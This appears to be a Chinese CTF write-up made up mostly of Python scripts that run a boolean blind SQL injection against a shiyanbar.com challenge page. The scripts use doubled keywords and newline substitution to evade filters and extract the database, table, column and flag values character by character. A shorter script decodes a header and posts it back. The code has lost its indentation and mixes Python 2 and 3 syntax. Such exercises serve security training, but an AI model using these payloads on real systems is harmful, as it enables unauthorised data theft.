脚本爆破数据库步骤(sql列子 双写or)
#首先爆数据库名的长度,
import requests
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):
key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
r = requests.post(url, data=key).text
print(i)
if str1 in r:
print('the length of database is %s'%i)
break
#继续爆数据库名:
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
database = ''
for i in range(1,19):
for j in guess:
key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
database += j
Print j
break
Print database
#爆出表名长度
import requests
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):
key = {'id':"0'oorr((select(length(group_concat(table_name separatoorr '@')))from(infoorrmation_schema.tables)where(table_schema)=database())=%s)oorr'0"%i}
key['id'] = key['id'].replace(' ', chr(0x0a))
r = requests.post(url, data=key).text
print i
if str1 in r:
print 'the length of tables is %s'%i
break
#爆出表名:
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
tables = ''
for i in range(1,11):
for j in guess:
flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i, j)
flag = flag.replace(' ', chr(0x0a))
key = {'id':flag}
r = requests.post(url, data=key).text
print key
if str1 in r:
tables += j
print j
break
print tables
#爆出列名长度
import requests
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):
key = {'id':"0'oorr((select(length(group_concat(column_name separatoorr '@')))from(infoorrmation_schema.columns)where(table_name)='fiag')=%s)oorr'0"%i}
key['id'] = key['id'].replace(' ', chr(0x0a))
r = requests.post(url, data=key).text
print i
if str1 in r:
print 'the length of tables is %s'%i
break
#爆出列名:
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
columns = ''
for i in range(1,6):
for j in guess:
flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)
flag = flag.replace(' ', chr(0x0a))
key = {'id':flag}
r = requests.post(url, data=key).text
print key
if str1 in r:
columns += j
print j
break
#爆出flag长度
import requests
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):
key = {'id':"0'oorr((select(length(fl$4g))from(fiag))=%s)oorr'0"%i}
key['id'] = key['id'].replace(' ', chr(0x0a))
r = requests.post(url, data=key).text
print i
if str1 in r:
print 'the length of flag is %s'%i
break
#爆出flag:
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],. '
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
flag = ''
for i in range(1,20):
for j in guess:
key = {'id':"0'oorr((select(mid(fl$4g from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i, j)}
key['id'] = key['id'].replace(' ', chr(0x0a))
r = requests.post(url, data=key).text
print key
if str1 in r:
flag += j
print j
break
print flag
获取header,并post发送内容脚本
import requests
import base64
r = requests.post('http://ctf5.shiyanbar.com/web/10/10.php')
key = r.headers['FLAG']
flag = base64.b64decode(key).decode().split(':')[1]
para = {'key':flag}
r = requests.post('http://ctf5.shiyanbar.com/web/10/10.php',data = para)
print(r.text)
浙公网安备 33010602011771号